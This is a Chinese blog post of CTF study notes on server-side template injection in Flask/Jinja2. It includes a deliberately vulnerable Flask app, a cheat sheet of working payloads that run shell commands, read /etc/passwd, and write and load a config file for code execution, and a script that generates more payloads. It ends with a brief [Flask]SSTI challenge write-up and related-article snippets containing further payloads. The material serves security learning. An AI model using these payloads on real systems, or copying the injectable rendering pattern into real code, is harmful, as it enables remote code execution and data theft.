flask_SSTI

最新推荐文章于 2025-05-09 23:54:54 发布
最新推荐文章于 2025-05-09 23:54:54 发布
阅读量344 收藏 1
点赞数 1
分类专栏: CTF 文章标签: python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35697696/article/details/127104586
版权
本文介绍了Flask应用程序中的Server-Side Template Injection(SSTI)漏洞原理,重点讲解了`render_template_string`函数如何导致命令执行。通过一个具体的[Flask]SSTI题目,展示了如何通过查看源码,利用name参数注入{{2*1}}进行探查,最终实现文件读取的操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理

详细可以看这个大哥写的:https://www.cnblogs.com/bmjoker/p/13508538.html

from flask import Flask, request
from flask import render_template, render_template_string

app = Flask(__name__)

'''
命令执行:
    ls
    {{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}}
    实例演示:    
'''

@app.route("/index")
def hello():
    # code = request.args.get("ssti")
    # return render_template_string("index.html", flag=code)
    code = request.args.get('ssti')
    html = '''
        <h1>qing -SSIT</h1>
        <h2>The ssti is </h2>
            <h3>%s</h3>
        ''' % (code)
    return render_template_string(html)


if __name__ == '__main__':
    app.debug = True
    app.run()
"""
python2:
读文件:
    {{config.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__[%27open%27](%27/etc/passwd%27).read()}}
    {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
写文件:
    {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}
任意执行:
    {{''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg','w').write('code')}}  
    {{ config.from_pyfile('/tmp/owned.cfg') }}
    {{''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg','w').write('from subprocess import check_output\n\nRUNCMD = check_output\n')}}  
    {{ config.from_pyfile('/tmp/owned.cfg') }}  
    {{ config['RUNCMD']('/usr/bin/id',shell=True) }}    

"""

漏洞函数render_template_string,是jinja把{{}}内容解释成变量,执行命令.
附上注入脚本

#!/usr/bin/python3
# coding=utf-8
# python 3.5
from flask import Flask
from jinja2 import Template

# Some of special names
searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__',
              '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__',
              '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__',
              "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__', '__getitem__',
              '__setitem__', '__iter__', '__delitem__', '__reversed__', '__contains__', '__add__', '__sub__', '__mul__']
neededFunction = ['eval', 'open', 'exec']
pay = int(input("Payload?[1|0]"))
for index, i in enumerate({}.__class__.__base__.__subclasses__()):
    for attr in searchList:
        if hasattr(i, attr):
            if eval('str(i.' + attr + ')[1:9]') == 'function':
                for goal in neededFunction:
                    if (eval('"' + goal + '" in i.' + attr + '.__globals__["__builtins__"].keys()')):
                        if pay != 1:
                            print(i.__name__, ":", attr, goal)
                        else:
                            print(
                                "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")

'''
实例:
payload例1:{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='PercentStyle' %}{{ c.__init__.__globals__['__builtins__'].open("[evil]") }}{% endif %}{% endfor %}
实际提交: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='PercentStyle' %}{{ c.__init__.__globals__['__builtins__'].open("app.py","r").read() }}{% endif %}{% endfor %}

*读取文件列表:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
*读文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

'''

题目

[Flask]SSTI

这题目进去没什么提示,那就直接去看源码,源码很简单

from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')

    t = Template("Hello " + name)
    return t.render()

if __name__ == "__main__":
    app.run()

得知参数为name,直接丢探针name={{2*1}}
之后基本就是固定套路了,读文件ok

Flask SSTI注入:探索模板注入漏洞
NfsVerilog的博客
09-22 210
然而,在某些情况下,如果未正确处理用户输入,并且将用户提供的数据直接传递给模板引擎进行渲染,攻击者可以利用这个漏洞来执行恶意代码。为了保护应用程序免受SSTI注入攻击,开发人员应该采取适当的防御措施,包括输入验证和过滤、白名单过滤、上下文感知、及时更新框架和组件,以及定期的安全审计和测试。确保只接受预期的输入,并对输入进行适当的转义或过滤,以防止恶意代码的注入。通过意识到这个漏洞的存在,并采取必要的防御措施,我们可以有效地减少SSTI注入带来的安全风险,并保护我们的应用程序和用户的数据安全。
SSTI-flask
unexpectedthing的博客
11-27 632
文章目录前言flask基础SSTI简介魔术方法命令执行文件读取通用命令执行过滤bypass参考文献 前言 从极客大挑战中一道题,虽然挺简单的,但是自己发现在模板注入中有很多不懂的东西。 flask基础 先理解flask的流程明白 from flask import flask @app.route('/index/') def hello_word(): return 'hello word' 其中@app.route(’/index/’),是将函数跟url绑定起来,当你访问http://xxx
【Real】[Flask]SSTI
欢迎来到我的学习笔记薄
05-28 1496
温馨提示:看到哪里不懂直接跳到知识点部分,理解完再回到解题过程。
SSTI模块注入】SSTI+Flask+Python(中):漏洞利用
07-25 1205
SSTI】漏洞利用
Flask SSTI/沙箱逃逸的一些总结
0xdawn的博客
03-18 1267
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器...
[pasecactf_2019]flask_ssti proc ssti config
m0_64180167的博客
12-13 921
其实这个很简单首先ssti 直接fenjing一把锁了这里被加密后 存储在 config中了 然后我们去config中查看即可{{config}}可以获取到flag的值然后就可以写代码解密因为都是异或 异或的异或就是 原本 所以不需要修改就可以输出flag。
[pasecactf_2019]flask_ssti
cjdgg的博客
07-05 2894
[pasecactf_2019]flask_ssti 进入题目后如下图所示 因为题目本身就提示ssti了,我也就直接尝试有没有过滤了 这里过滤了下划线,使用十六进制编码绕过,_编码后为\x5f, .过滤的话我们直接用[]包含绕过 这里过滤了单引号,我们用双引号绕过 这题过滤已经找完了,接下来是构造 相当于执行{{class}} 相当于执行{{class.bases[0]}} 相当于执行{{class.bases[0].subclasses()}} 下面贴一个脚本用来找可用类 import js
BUUCTF--[pasecactf_2019]flask_ssti
qq_46263951的博客
08-12 641
根据题目我们可以知道这是一道Flask SSTI的题。 打开后允许我们输入东西,会返回用奇怪字符包裹的昵称。 我们试一下{{2*2}},然后返回4。这里存在这SSTI。 这里过滤了很多东西,就不在一一测试,使用十六进制进行绕过. #转16进制py脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2635
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
BUUCTF-Real-[Flask]SSTI
分享
02-02 1446
服务端模板注入SSTI,可进行代码执行操作!
BugKu:Simple_SSTI
m0_63944205的博客
07-30 202
如图所示,我们会得到相关的提示,根据提示信息,我们利用。1.这里我们看到需要我们注入一个flag参数。3.这里我们去传入flag查看config。1.这里告诉我们需要传一个flag的参数。3.这里我们利用flask的模板注入。的模板注入,就能直接得到flag。2.我们f12查看这里提示我们。2.我们同样的去查看页面源代码。发现页面很乱,不能得到有用信息。4.我们尝试SSTI模版注入。5.我们依次读取目录看看\。我们发现了flage目录,6.我们查看flage。
关于flaskSSTI注入
Kr的博客
01-21 7350
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2380
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
基于WebUI的深度学习模型部署与应用实践
Programming Talk
05-06 426
随着深度学习技术的快速发展,如何将训练好的模型快速部署并提供友好的用户交互界面成为许多AI项目落地的关键。WebUI(Web User Interface)作为一种轻量级、跨平台的解决方案,正被广泛应用于各类AI模型的部署场景。本文将详细介绍基于Python生态构建WebUI的技术方案,包含完整的代码实现,并探讨在实际项目中的应用实践。本文详细介绍了基于Gradio构建深度学习WebUI的完整流程,从基础实现到生产部署,涵盖了实际项目中的关键技术和优化方案。二、基于Gradio的模型部署实践。
Python办公自动化应用(三)
2301_78858267的博客
05-07 445
根据中、英文对照字典(参见Python办公自动化应用(一))将Excel表单元格里的中文替换为英文。
QuecPython错误码汇总
Quectel的博客
05-06 662
QuecPython中定义的各种错误代码常量
Jupyter Notebook为什么适合数据分析?
qq_70350287的博客
05-06 1002
jupyter它就像是一个多功能的工作间,给你提供了一个特殊的环境。比如说,你写了一大段代码,只想看看其中某个函数的运行效果,就可以把这个函数所在的代码块单独拿出来执行,不用重新运行整个程序,既节省时间又方便调试。代码上方的菜单栏提供了操作单元格的各种选项:insert (添加),edit (编辑),cut (剪切),move cell up/down (上下移动单元格),run cells(在单元格中运行代码),interupt (停止代码),save (保存工作),以及 restart (重新启动内核)
CentOS9与Windows通过Samba实现永久共享配置
m0_74744788的博客
05-09 264
对于Samba服务的正常运行至关重要。首先设置SELinux布尔值(或者直接关了selinux)如果上述命令无法成功执行,可能需要手动添加Samba使用的端口。配置防火墙和SELinux策略(如果可以直接把防火墙关了)最后在windows资源管理器里输入linux ip。重启Samba服务并设置开机自启动。
【库(Library)、包(Package)和模块(Module)解析】
最新发布
赶紧的博客
05-09 274
my_utils/├── __init__.py # 声明为包 ├── math_utils.py # 模块:数学工具 └── string_utils.py # 模块:字符串工具# 允许直接导入包时访问子模块__all__ = ['add', 'multiply', 'reverse_string'] # 定义*导入的范围使用方式my_utils.add(1, 2) # 直接调用。
bugkuctfweb题解simple_ssti_1
06-28
### 回答1: simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符串嵌入到一个 Flask 模板中,并将渲染后的页面返回给用户。攻击者可以在输入框中输入包含 SSTI 代码的字符串,从而在服务器上执行任意代码。 为了解决这个问题,可以使用 Flask 的 Jinja2 模板引擎提供的 safe 过滤器来过滤用户输入,防止用户输入的字符串被作为代码执行。或者在编写模板时,尽量避免使用可执行的表达式,而是将变量放在 HTML 标签中输出。 这个题目是一个很好的 SSTI 注入练习题目,可以帮助我们了解 SSTI 注入的危害和防御方法。 ### 回答2: Simple_ssti_1是BugsKiller CTF比赛中的一道Web题目,考察的知识点是SSTI(Server-Side Template Injection)模板注入,需要寻找漏洞点并利用SSTI漏洞构造payload,达到读取/执行任意代码的目的。 首先,我们下载题目附件simple_ssti_1.zip,获得题目源代码及相关文件。查看代码,发现以下几点: 1. 程序的入口是index.php文件,包含了一个GET参数tpl,可控注入的点在这里。 2. 向模板文件simple_ssti_1_template.html中传入tpl参数,在该文件中执行了{{tpl}}操作,将tpl参数进行了模板渲染。 3. SSTI的注入点在于,如果我们的攻击payload中包含了一些特殊模板语法的操作符,如{{3*3}}、{{config}}等,这些操作符会被解析器自动执行,导致代码注入进去。 从上述代码的分析可知,我们首先需要构造包含有SSTI操作符的payload才能进行下一步的SSTI构造。继续观察代码,我们发现一个{{config}}变量被渲染在了simple_ssti_1_template.html的头部中,我们可以通过注入payload来构造一个同名的config变量,从而读取根目录的敏感文件/flag.php。 构造payload : {{config.__class__.__init__.__globals__['os'].popen('cat flag.php').read()}} 这个SSTI注入的payload实现了直接运行命令cat flag.php然后读取文件的操作。注入的{{config}}变量实际上是一个自定义的config字典,含有很多内置函数,比如__class__.__init__.__globals__,它的作用是获取全局变量__builtins__,然后通过这个全局字典来获取os模块,之后就可以使用os模块的popen函数运行cat命令来获取flag.php文件内容了。 最终的payload为: ?tpl={{config.__class__.__init__.__globals__['os'].popen('cat /flag.php').read()}} 再通过浏览器发送带有payload的GET请求,就可以读取/root/flag.php中的flag了。 ### 回答3: 简单SSTI 1是一道基于SSTI漏洞的Web安全挑战题目,该题的难度属于初级。本题需要掌握一定的SSTI漏洞的相关知识和技巧,以及对模板中的变量注入点的识别和利用能力。 首先,我们尝试在输入框中输入简单的Python表达式,例如{{2+2}},并提交请求,发现得到的响应结果为4,表明该网站存在SSTI漏洞。接着,我们可以构造一些特殊的表达式进行测试,例如{{123456789}}, {{2**100}}, {{'hello ' + 'world'}}, 发现均能得到正确的响应结果。 接着我们需要进行变量注入点的识别和利用,这里,我们可以通过利用flask框架中的特殊变量,例如request、g等来实现变量注入,例如{{config}},可以获得flask的配置信息,{{request}}可以获得当前请求的一些信息。需要注意的是,在实战中,这些利用方式可能会受到服务器的限制,无法完全实现。 最后,我们需要尝试获取敏感信息或者升级我们的权限,例如{{''.__class__.mro()[1].__subclasses__()[71]('/etc/passwd').read()}},可以获取到服务器上/etc/passwd文件的内容。 总之,简单的SSTI漏洞需要熟练掌握SSTI漏洞的相关知识和技巧,识别变量注入点并利用它们获取敏感信息和升级权限,可以通过CTF题目学习,提高自己的Web安全攻防能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值